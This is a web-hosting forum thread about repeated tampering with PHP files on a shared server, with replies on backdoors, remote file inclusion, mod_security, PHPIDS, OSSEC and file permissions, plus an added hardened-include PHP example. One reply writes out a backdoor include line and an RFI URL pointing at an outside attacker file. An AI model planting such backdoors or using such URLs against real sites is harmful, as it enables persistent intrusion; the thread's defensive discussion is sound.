Hi, we have a situation on our server where we have locked down most things, e.g. services like FTP and DirectAdmin are allowed from a few IPs only. We are using Smarty with PHP and MySQL. In our sites we have only one folder with 777 permissions, for the Smarty cache; the rest of the files and folders have 644 and 755 permissions. For some requirements we have to generate HTML pages dynamically for the CMS or for SEO purposes. Initially we were using a PHP function for that which required the public_html folder to have 777 permissions, which caused problems for us and we got hacked, so we changed this code and used the PHP FTP functions. Basically we created a separate FTP user which we were using in the code to generate pages, upload images, etc. Still we got hacked recently and somebody has put code in some files. We are just wondering how this happened, because we have everything IP based, and we are sure nothing has been done internally by anyone in the team. The server admin is saying it happened via the separate FTP user which we created, but there is nothing specific in the server logs. So we came to the conclusion not to use the FTP functions, and not to use the PHP upload functions as they require 777 permissions. We have turned the FTP service OFF to observe, but still our files are getting hacked and someone is putting some strange code in our files. Can anyone help us find out how, despite all these restrictions, someone is able to change the code in our files? Thanks!!!
Sure! First let me talk about the strange PHP code you mentioned. After hackers get in somewhere, to keep their access to the server they put PHP code in your PHP files, like this for example: <?php include($HostPersia); ?> Imagine I put this code in your page2.php on your site; later, after you have deleted my webshells from your account, I can get my access BACK just like this: http://your-site.com/page2.php?HostPersia=http://devilcodez.txt? (this is RFI = Remote File Inclusion). So make sure your scripts are clean! After that, you are on a shared host??? So LOL!!! It's really easy to do things like this on servers that are not secured well. I suggest you just move to a secured server if you really need 777 directories, because if any other site on the shared host gets hacked, then you are hacked too, because hackers can get access to other accounts just by switching directory (imagine xxx.com and yoursite.com are on the same server, then xxx.com is hacked; its public_html was here: /home/xxx/public_html; after that the hackers upload a webshell and then try to access your home directory, /home/you/public_html, and then they see the 777 directory). I can help you if you need any security advice or a secured shared host.
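As an added example (not code from any poster in this thread), here is the defensive counterpart to the include pattern shown above: the request value is used only as a key into a fixed allow-list of local files and never handed to include() directly, so neither a URL nor a path can be injected. The page names, file paths and the resolve_page() helper are constructed for this illustration.

```php
<?php
// Added example: hardened page inclusion. The weak form in the post above
// passes a request-controlled string straight to include(); here the request
// only selects an entry from a fixed map, so the included path is always ours.
declare(strict_types=1);

// Constructed allow-list: request key => local template relative to a base dir.
const ALLOWED_PAGES = [
    'home'    => 'pages/home.php',
    'contact' => 'pages/contact.php',
];

/**
 * Resolve a requested page name to a local path, or null if it is not allowed.
 * The request value is only ever used as an array key, so values such as
 * "http://..." or "../../etc/passwd" can never reach include().
 */
function resolve_page(string $requested, string $baseDir): ?string
{
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    $path = realpath($baseDir . '/' . ALLOWED_PAGES[$requested]);
    $base = realpath($baseDir);
    // Defence in depth: confirm the resolved file still sits under $baseDir
    // (catches a bad entry in the map, a symlink, or a missing file).
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Usage: ?page=... can only choose among the known pages; anything else is 404.
$page = resolve_page((string)($_GET['page'] ?? 'home'), __DIR__);
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $page;
```

On the server side, PHP's allow_url_include=Off and register_globals=Off in php.ini remove the remote-include route entirely; the allow-list above is the application-level check that does not depend on the host's configuration.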
Does mod_security prevent RFI attacks? Are you sure? Because I don't think so. Of course you can limit RFI attacks by using mod_security, but it doesn't prevent them; for XSS and SQL injection attacks I suggest DotDefender, and for RFI I suggest you use secure PHP code on your website and, of course, be on a secured shared hosting.
This is not the problem you are working on. Your website is penetrable, meaning attackable. If you want a solution please mail me at smartguy87(at)ymail(dot)com
Both of you don't know what you're talking about. Mod_Security prevents a large amount of attacks; if the server security is set up correctly, RFIs should not be a worry at all.
If you don't know how to secure your PHP files and don't have access to the server to install mod_security... I'd recommend installing and trying PHPIDS (http://php-ids.org/). Here are 2 articles on how to setup PHPIDS: http://www.phpfreaks.com/tutorial/protecting-php-applications-with-phpids http://www.irongeek.com/i.php?page=security/phpids-install-notes
A good tool to use too is OSSEC ( ossec.net ) (free and open source). It will monitor your system and block most brute force attacks, web scanners, etc. Very simple to install and use.
Using 777 permission means you're asking for a problem. Use chown instead. Never had any problems with directories used for caching purposes.